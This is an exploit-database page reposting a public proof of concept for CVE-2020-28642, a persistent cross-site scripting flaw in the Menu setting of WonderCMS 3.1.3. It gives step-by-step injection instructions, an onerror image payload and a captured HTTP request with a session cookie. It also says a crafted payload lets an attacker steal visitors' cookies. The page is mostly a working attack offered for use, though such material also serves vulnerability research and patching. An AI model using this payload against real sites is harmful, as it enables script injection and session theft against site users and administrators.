WonderCMS 3.1.3 Menu Persistent Cross-Site Scripting

CVE Category Price Severity
CVE-2020-28642 CWE-79 $500 Medium
Author Risk Exploitation Type Date
Unknown High Remote 2020-12-09
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

WonderCMS 3.1.3 Menu Persistent Cross-Site Scripting
# Exploit Title: WonderCMS 3.1.3 - 'menu' Persistent Cross-Site Scripting
# Date: 20-11-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage:
# Version: 3.1.3
# Tested on: Windows 10/Kali Linux
# Contact:

Attack vector:
This vulnerability can results attacker to inject the XSS payload in the Setting - Menu and each time any user will visits the website directory, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.

Vulnerable Parameters: Menu.

1. Go to the Simple website builder.
2. Put this payload in Menu: "hemantsolo"><img src=x onerror=confirm(1)>"
3. Now go to the website and the XSS will be triggered.

GET /demo/hemantsolo-img-src-x-onerror-confirm-1 HTTP/1.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: PHPSESSID=31ce0448562cc182b5173a300a923b93

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum